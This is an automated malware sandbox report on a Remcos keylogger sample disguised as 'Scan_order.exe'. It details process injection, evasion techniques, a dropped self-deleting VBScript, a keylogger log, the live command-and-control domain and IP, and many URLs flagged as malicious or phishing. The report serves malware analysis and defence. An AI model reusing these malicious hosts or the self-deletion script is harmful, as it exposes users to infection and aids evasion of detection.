Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C16EC mov eax, dword ptr fs:[00000030h]	0_2_021C16EC
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C4F5A mov eax, dword ptr fs:[00000030h]	0_2_021C4F5A
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C4F51 mov eax, dword ptr fs:[00000030h]	0_2_021C4F51
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C4F60 mov eax, dword ptr fs:[00000030h]	0_2_021C4F60
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1C19 mov eax, dword ptr fs:[00000030h]	0_2_021C1C19
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C1C0A mov eax, dword ptr fs:[00000030h]	0_2_021C1C0A
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C550F mov eax, dword ptr fs:[00000030h]	0_2_021C550F
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C550B mov eax, dword ptr fs:[00000030h]	0_2_021C550B
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5536 mov eax, dword ptr fs:[00000030h]	0_2_021C5536
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5524 mov eax, dword ptr fs:[00000030h]	0_2_021C5524
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C4558 mov eax, dword ptr fs:[00000030h]	0_2_021C4558
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C557D mov eax, dword ptr fs:[00000030h]	0_2_021C557D
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C5581 mov eax, dword ptr fs:[00000030h]	0_2_021C5581
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C55A9 mov eax, dword ptr fs:[00000030h]	0_2_021C55A9
Source: C:\Users\user\Desktop\Scan_order.exe	Code function: 0_2_021C55CD mov eax, dword ptr fs:[00000030h]	0_2_021C55CD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D2B15 mov eax, dword ptr fs:[00000030h]	25_2_032D2B15
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D4F60 mov eax, dword ptr fs:[00000030h]	25_2_032D4F60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D4F5A mov eax, dword ptr fs:[00000030h]	25_2_032D4F5A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D4F51 mov eax, dword ptr fs:[00000030h]	25_2_032D4F51
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D5524 mov eax, dword ptr fs:[00000030h]	25_2_032D5524
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D5536 mov eax, dword ptr fs:[00000030h]	25_2_032D5536
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D550F mov eax, dword ptr fs:[00000030h]	25_2_032D550F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D550B mov eax, dword ptr fs:[00000030h]	25_2_032D550B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D557D mov eax, dword ptr fs:[00000030h]	25_2_032D557D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D4558 mov eax, dword ptr fs:[00000030h]	25_2_032D4558
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D55A9 mov eax, dword ptr fs:[00000030h]	25_2_032D55A9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D5581 mov eax, dword ptr fs:[00000030h]	25_2_032D5581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 25_2_032D55CD mov eax, dword ptr fs:[00000030h]	25_2_032D55CD

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Scan_order.exe

Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 32D0000

Jump to behavior

Source: C:\Users\user\Desktop\Scan_order.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\Scan_order.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Scan_order.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\Scan_order.exe'	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\uninstall.vbs'	Jump to behavior

Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Manager[\|
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Manager
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Managerros\logs.dat\|
Source: logs.dat.25.dr	Binary or memory string: [ Program Manager ]
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Manager0\|
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Managerr\|
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: \|Program Manager
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Manager StartedL
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: Program Manager Starteder8
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: \|Program Managering\remcos\logs.dT
Source: ieinstal.exe, 00000019.00000002.689708466.0000000003867000.00000004.00000040.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Path Interception	Process Injection112	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion23	LSASS Memory	Security Software Discovery731	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion23	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery32	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
wealthyblessed.myddns.rocks	185.157.161.61	true	true	unknown
googlehosted.l.googleusercontent.com	172.217.23.1	true	false	high
doc-0c-8c-docs.googleusercontent.com	unknown	unknown	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.23.1	unknown	United States		15169	GOOGLEUS	false
185.157.161.61	unknown	Sweden		197595	OBE-EUROPEObenetworkEuropeSE	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337854
Start date:	11.01.2021
Start time:	08:08:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Scan_order.scr (renamed file extension from scr to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/2@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.5% (good quality ratio 1.4%) Quality average: 45.8% Quality standard deviation: 11.2%
HCA Information:	Successful, ratio: 78% Number of executed functions: 197 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 13.64.90.137, 104.79.90.110, 20.190.129.2, 40.126.1.145, 20.190.129.160, 20.190.129.133, 40.126.1.128, 20.190.129.130, 40.126.1.130, 40.126.1.142, 51.104.139.180, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.11.168.160, 52.155.217.156, 172.217.23.14, 20.190.129.17, 20.190.129.24, 40.126.1.166, 20.190.129.19, 51.11.168.232, 2.20.142.209, 2.20.142.210 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/337854/sample/Scan_order.exe
Errors:	Sigma syntax error: Has an empty selector, Rule: Abusing Azure Browser SSO

Simulations

Behavior and APIs

Time	Type	Description
08:12:00	API Interceptor	408x Sleep call for process: ieinstal.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.217.23.1	Images for New materials H12Etxknwemhib9.exe	Get hash	malicious	Browse
	undefined.html	Get hash	malicious	Browse
	http://www.dropbox.com/l/AAA5d-90vlipt6OAJjh2DZ1FLO-gN1n6Y0k	Get hash	malicious	Browse
	Order List.exe	Get hash	malicious	Browse
	https://docs.google.com/document/d/e/2PACX-1vQ2WKVd3JleNdWlUHfoPHiI9meS5tPYCvu_arjbyKKIg7TwWXSlOD1XSnaOARjo0G7h2c08To_2PmFI/pub	Get hash	malicious	Browse
	https://www.evernote.com/shard/s392/sh/fa9d8bce-6c75-8e4b-f292-c8e5922b6f12/2c2e75787ef91022dc2eb256a739682c	Get hash	malicious	Browse
	http://freeaccountnow.com	Get hash	malicious	Browse
	https://docs.google.com/document/d/e/2PACX-1vRFLfuWRihaQHjGEPs8-Dm7Y3VxEFRpiUJuJmD9Vm6y3xVSSG9Vc3XxRnbyHQzIoWQ_5REbdDbkOq0s/pub	Get hash	malicious	Browse
	Request For quotation-00900.exe	Get hash	malicious	Browse
	http://www.146146.cynemas.site./RGFybmVsbC5NYXRoZXdAY29nZWNvcGVlcjEuY29t#aHR0cHM6Ly9zaXRlcy5nb29nbGUuY29tL3ZpZXcvZWVyZTM0Mi8lRDglQTclRDklODQlRDglQjUlRDklODElRDglQUQlRDglQTktJUQ4JUE3JUQ5JTg0JUQ4JUIxJUQ4JUE2JUQ5JThBJUQ4JUIzJUQ5JThBJUQ4JUE5	Get hash	malicious	Browse
	https://docs.google.com/document/d/e/2PACX-1vSXSFqM3FyfkgqlaUuBs15kxzZ2ytYMtEH-lt-VAyaJGjbE3AvRzWL0WZQ7F1gIxKGQpEkm2Ri_snvl/pub	Get hash	malicious	Browse
	PR-0012575 (P 999).exe	Get hash	malicious	Browse
	https://tuak.cmail19.com/t/t-i-xykuka-l-r/	Get hash	malicious	Browse
	http://www.154154.bd.ntipak.com/aXJlbmVfY2hhbkBzdXRkLmVkdS5zZw==#aHR0cHM6Ly9zaXRlcy5nb29nbGUuY29tL3ZpZXcvbW1uYi8lRDglQTclRDklODQlRDglQjUlRDklODElRDglQUQlRDglQTktJUQ4JUE3JUQ5JTg0JUQ4JUIxJUQ4JUE2JUQ5JThBJUQ4JUIzJUQ5JThBJUQ4JUE5	Get hash	malicious	Browse
	http://www.154154.bd.ntipak.com/aXJlbmVfY2hhbkBzdXRkLmVkdS5zZw==#aHR0cHM6Ly9zaXRlcy5nb29nbGUuY29tL3ZpZXcvbW1uYi8lRDglQTclRDklODQlRDglQjUlRDklODElRDglQUQlRDglQTktJUQ4JUE3JUQ5JTg0JUQ4JUIxJUQ4JUE2JUQ5JThBJUQ4JUIzJUQ5JThBJUQ4JUE5	Get hash	malicious	Browse
	https://docs.google.com/document/d/e/2PACX-1vSddy8cuFSrePEDADFWqOFMq31iEt3VTknn8s0o66ouwgLfYqTCG7MSJvch7KcyR03mvmYMJg1Kh7lk/pub	Get hash	malicious	Browse
	https://docs.google.com/document/d/e/2PACX-1vQl8xkPTC5qcRYddleeD1wWjcL_--hdx0xmAEkwmmMnX6FXnPPI-eTnY7H4kljKVOeNuw_n16-YWE8v/pub	Get hash	malicious	Browse
	https://u2109837.ct.sendgrid.net/ls/click?upn=ZZ6GL0ia6ZQqkHdNqmcfnzjKMlvomZCQgE3kAyJdsXh7HvgQ2sCYDvk7NVAOuyTHb4xXVycnbXvYmGLTwLvXqlr-2FBH7O-2F0sVebcrSi3wRAMnqysyGCkq3KDTz4rGE56KJbrbg5mYb0pZbdZr2hfCwkjkHfsLEQHJq26n9MbwBgSPBCfBmTAw89TNFmIXOWNgEnCv_TmoPLIbax9Jh83rXf3CKCVf12BRNQLs5vTp0XFzzHhSTjJ689hADNCj94vLJ0pVWCcnqGZbEr5n33c4fDosWEocENGB3Oz4505qLzziVwjY-2FU2OHI-2BUytdgZg08iOUQHYVA2mg-2F765B7tOcBDzWCeXXJvpMpTRZrtem0FeuQJ9Lt-2BKa-2BPLFmOTTbRy6Mp3SEhYQHWiVe4JER4ZKmX41wsxK3Nbbdn0r-2FMyMZS2hyINI-3D	Get hash	malicious	Browse
	https://l.facebook.com/l.php?u=https%3A%2F%2Ftinyurl.com%2Fy3da9xbq%3Ffbclid%3DIwAR11jNtpFJqmHsfB6MuN4oB-gl7-RlVZqSgYIbmZW4ycJwtQ-tC85PzgLO4&h=AT1i9PU8X_itDVqe5yg4Afn5zFPp0KVwni5sQg-Oc5Yor7a-8EWrOl11b-y21X_Oi92_H_jMhPiEjm3aKUnMEib9p96Fuptgd9vraABiOS8AO8X86OxcPZyET7VlHYnKBg&__tn__=H-R&c[0]=AT26jLdBW-b9efDmUD2-IVQDmvnfjC8zMcJVpGrmXtfU07ZmaRqvjC3hcq86tiO8rGqmY2DrakboCaPRMLQtsl2m1yZfExawqplv_zZwazNNYlc2wsoaV6LvzXDEPrWYoMbJFnx7l8Qm7vznPPnkddWEuQ	Get hash	malicious	Browse
	https://u8044497.ct.sendgrid.net/ls/click?upn=2kG68ZigzTjarF-2BMq-2BkFKRCI85rLMeWLq4nFd21f8aWMar1nyH1bpDl6QTriB-2BCg9ZRVuS5KNgyqJvrwEERxoCN-2FuJNCLk-2FKWpotJvzpXzhK5ZrQRQIuKE2scLJ6pxOJGqxvH-2FdFgC9ylH2T9F-2F-2F87QanD-2B78vn33Psi-2FpSvawsFv5nBPk3yW8zOfIG-2F8LMbQKnY_E0HJ-2FOm5MWj9o-2F074sR7ar3EENZ9HXqrwFihx-2BlxgKrKtNrT8HHD9UvVOlQfmJqHouKdBiD0cPuRxKhdbr-2BdBDCJw-2FpPJ6Rhg8Rcuykg2re83cPJOlx1ck9OfAJuT20-2Bg-2FHKW3ZtFIgFXmtA3eRHIhUPakM-2F1wd24fcVrApKwPA4Zq7KEN7k9VTA7qQX29revWsMXFb-2FufLF7Xz8-2FlzYJA-3D-3D	Get hash	malicious	Browse
185.157.161.61	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse
185.157.161.61	New PO.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyblessed.myddns.rocks	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	185.157.161.61
wealthyblessed.myddns.rocks	New PO.doc	Get hash	malicious	Browse	185.157.161.61
googlehosted.l.googleusercontent.com	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	142.250.180.97
	New PO.doc	Get hash	malicious	Browse	142.250.180.97
	http://down10d.zol.com.cn/zoldownload/fangsong_GB231 2@81_432727.exe	Get hash	malicious	Browse	142.250.180.97
	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#joetorre@gmail.com	Get hash	malicious	Browse	142.250.180.97
	http://kubecloud.com	Get hash	malicious	Browse	142.250.180.97
	https://blog.dericoin.com/wp-includes/shell/ivd/office/office/voicemail/index.php	Get hash	malicious	Browse	142.250.180.97
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse	142.250.180.97
	jfuoevj.exe	Get hash	malicious	Browse	142.250.180.97
	http://subreqxserver1132.azurewebsites.net	Get hash	malicious	Browse	142.250.180.97
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse	142.250.180.97
	https://wfuwdbjwquoiynfb-dot-tundasma.el.r.appspot.com/#test@test.com	Get hash	malicious	Browse	142.250.180.97
	r0u.exe	Get hash	malicious	Browse	142.250.180.97
	r0u.exe	Get hash	malicious	Browse	142.250.180.97
	http://bit.ly/3nlGvk0	Get hash	malicious	Browse	216.58.206.33
	http://fokpsrhpqilmgun.65kjh455kh566gf.camdvr.org	Get hash	malicious	Browse	216.58.206.33
	https://pdfsharedmessage.xtensio.com/7wtcdlta	Get hash	malicious	Browse	216.58.206.33
	#Ud83d#Udcde_8360.htm	Get hash	malicious	Browse	216.58.215.225
	Westernsouthernlife8PG5-YSGL2K-TVU4.htm	Get hash	malicious	Browse	216.58.215.225
	https://alijafari6.wixsite.com/owa-projection-aspx	Get hash	malicious	Browse	216.58.215.225
	zsmcirs.exe	Get hash	malicious	Browse	216.58.215.225

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OBE-EUROPEObenetworkEuropeSE	inrfzFzDHR.exe	Get hash	malicious	Browse	45.148.16.42
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	185.157.161.61
	New PO.doc	Get hash	malicious	Browse	185.157.161.61
	89GsVCJAXv.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	dpR3o92MH1.exe	Get hash	malicious	Browse	185.157.162.81
	0qNSJXB8nG.exe	Get hash	malicious	Browse	185.157.162.81
	Order_1101201918_AUTECH.exe	Get hash	malicious	Browse	185.157.161.86
	7w7LwD8bqe.exe	Get hash	malicious	Browse	185.157.162.81
	ZZB5zuv1X0.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	ptoovvKZ80.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	EnJsj6nuD4.exe	Get hash	malicious	Browse	185.157.162.81
	AdviceSlip.xls	Get hash	malicious	Browse	217.64.149.169
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
GOOGLEUS	correos-1.apk	Get hash	malicious	Browse	216.58.198.42
	correos-1.apk	Get hash	malicious	Browse	216.58.198.10
	parler.apk	Get hash	malicious	Browse	216.58.198.10
	parler.apk	Get hash	malicious	Browse	142.250.180.131
	Riskware.apk	Get hash	malicious	Browse	216.58.198.10
	transcach.exe	Get hash	malicious	Browse	172.253.120.109
	PCS.exe	Get hash	malicious	Browse	172.253.120.109
	transcach.exe	Get hash	malicious	Browse	172.253.120.109
	freezer-arm32-0.6.8.apk	Get hash	malicious	Browse	216.239.35.12
	freezer-arm32-0.6.8.apk	Get hash	malicious	Browse	216.239.35.0
	mobdro.apk	Get hash	malicious	Browse	142.250.180.174
	mobdro.apk	Get hash	malicious	Browse	142.250.180.174
	ddkMUJ9VLH.exe	Get hash	malicious	Browse	8.8.8.8
	AptoideTV-5.1.2.apk	Get hash	malicious	Browse	142.250.180.142
	com.parler.parler-2.6.6-free-www.apksum.com.apk	Get hash	malicious	Browse	142.250.180.74
	Pending PURCHASE ORDER - 47001516.pdf.exe	Get hash	malicious	Browse	34.102.136.180
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	142.250.180.97
	FTH2004-005.exe	Get hash	malicious	Browse	34.102.136.180
	Curriculo Laura.xlsm	Get hash	malicious	Browse	35.241.57.45
	Confirm!!!..exe	Get hash	malicious	Browse	34.102.136.180

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	_00AC0000.exe	Get hash	malicious	Browse	172.217.23.1
	SecuriteInfo.com.BehavesLike.Win32.Trojan.jc.exe	Get hash	malicious	Browse	172.217.23.1
	SecuriteInfo.com.BehavesLike.Win32.Trojan.jc.exe	Get hash	malicious	Browse	172.217.23.1
	SecuriteInfo.com.BehavesLike.Win32.Trojan.jc.exe	Get hash	malicious	Browse	172.217.23.1
	SecuriteInfo.com.Trojan.GenericKD.44525883.8642.exe	Get hash	malicious	Browse	172.217.23.1
	11998704458248.exe	Get hash	malicious	Browse	172.217.23.1
	KeyMaker.exe	Get hash	malicious	Browse	172.217.23.1
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	172.217.23.1
	home.css.ps1	Get hash	malicious	Browse	172.217.23.1
	Curriculo Laura.xlsm	Get hash	malicious	Browse	172.217.23.1
	36.exe	Get hash	malicious	Browse	172.217.23.1
	Buran.exe	Get hash	malicious	Browse	172.217.23.1
	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#joetorre@gmail.com	Get hash	malicious	Browse	172.217.23.1
	https://survey.alchemer.com/s3/6130663/Check-11-Payment	Get hash	malicious	Browse	172.217.23.1
	https://smlfinance.com/wp-content/uploads/2021/DHL2021/MARKET/	Get hash	malicious	Browse	172.217.23.1
	atikmdag-patcher 1.4.8.exe	Get hash	malicious	Browse	172.217.23.1
	https://atacadaodocompensado.com.br/office356.com-RD163	Get hash	malicious	Browse	172.217.23.1
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse	172.217.23.1
	jfuoevj.exe	Get hash	malicious	Browse	172.217.23.1
	https://blog.dericoin.com/wp-includes/shell/ivd/Office/office/voicemail/index.php	Get hash	malicious	Browse	172.217.23.1

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\uninstall.vbs Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	data
Category:	dropped
Size (bytes):	366
Entropy (8bit):	3.376225730361457
Encrypted:	false
SSDEEP:	6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgUubdlrYM3LkMl4YLMYRdn9YKJRB4y8:xQ4lA2++ugypjBQMB3DubdpYGkMJH9Zk
MD5:	0FE2423601D3291B0B6326E6518286A0
SHA1:	09746EB739147F191068ABA1552CD616EABD5E1D
SHA-256:	1A899121E3969C2BB894E08765A57E8A65CB9154D71C3825BAA6B4F2DA61D8F3
SHA-512:	9632ACAA96BF0D7BC5F3754D15117079888FCC23591007FC7F4D5DABFDB1E9300CF96FF3EE9266FE2D29EA118623651773D1002D5A3F91270471841D5012CEC6
Malicious:	false
Reputation:	low
Preview:	O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.\.i.e.i.n.s.t.a.l...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	125
Entropy (8bit):	4.639773731024033
Encrypted:	false
SSDEEP:	3:ttUAdUPVWJKrA4RXMRPHv31ae1voVEAv5EJMLrA4RXMRPHvn:tmSgO4XqdHv3I92NM/XqdHvn
MD5:	5B63CB81C36495441D67E06B293B0320
SHA1:	14246085597E9585F67E58065DE13C096926F008
SHA-256:	787158C4FCB177C4861EC3BC08D21AEA5D0807EE46725D35EFB392530E079834
SHA-512:	A077CF0DF572B374B411E2AFED6C749E4D54F8FFDB4AF9538AF7443C92BB7B59B76A28DB00BB5C6734594F88956C9B89B3DA510046A8853DAD3D791EECAC8848
Malicious:	true
Reputation:	low
Preview:	..[2021/01/11 08:12:00 Offline Keylogger Started]....[ Program Manager ]....[2021/01/11 09:16:06 Offline Keylogger Started]..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.746554652121395
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Scan_order.exe
File size:	77824
MD5:	04be7ed51e345a56403df4657b376990
SHA1:	44f5fdf6902d114524afc110cd927f95f72903fa
SHA256:	ab77af2c0fe4a39b3e2ec7b7450ef36999baf7c66316f4b3934d5a60e124d50c
SHA512:	0b71a26ad38bbc0c1fb37854f636125012cfa6177afa1de4291756e5bdbe3bc07df157a1eb4ba7c3ee82055ece44ec21157ff14a6d66df14b0a720ad410afd21
SSDEEP:	1536:Klk8B6BXvSJtdFpIqRD0rKMIU/EmmwMOKEKkLQJDy2:crYVvOtdFp9gK88zOKEKkLQJd
